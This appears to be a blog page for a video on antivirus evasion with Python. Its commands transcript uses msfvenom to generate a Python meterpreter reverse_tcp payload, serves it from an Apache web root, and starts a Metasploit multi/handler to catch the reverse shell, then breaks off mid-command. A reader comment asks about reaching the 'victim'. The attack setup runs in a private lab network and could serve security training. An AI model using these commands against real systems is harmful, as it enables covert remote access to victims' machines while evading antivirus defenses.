Antivirus Evasion with Python



The full article related to this video is available at:

Commands transcript:

Kali Linux (IP: 10.0.2.10):
msfvenom -p python/meterpreter/reverse_tcp LHOST=10.0.2.10 LPORT=443 -f raw -o /var/www/html/mrtp.py
service apache2 start
msfconsole
use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 10.0.2.10
set LPORT…

, , ,

1 thought on “Antivirus Evasion with Python

  1. Hello,It is mandatory to go through the Shell before you refer to the victim, or I can simply direct you from Kali linux Directly to the "Victim"

    I await your response, very good video!

Leave a Reply

Your email address will not be published. Required fields are marked *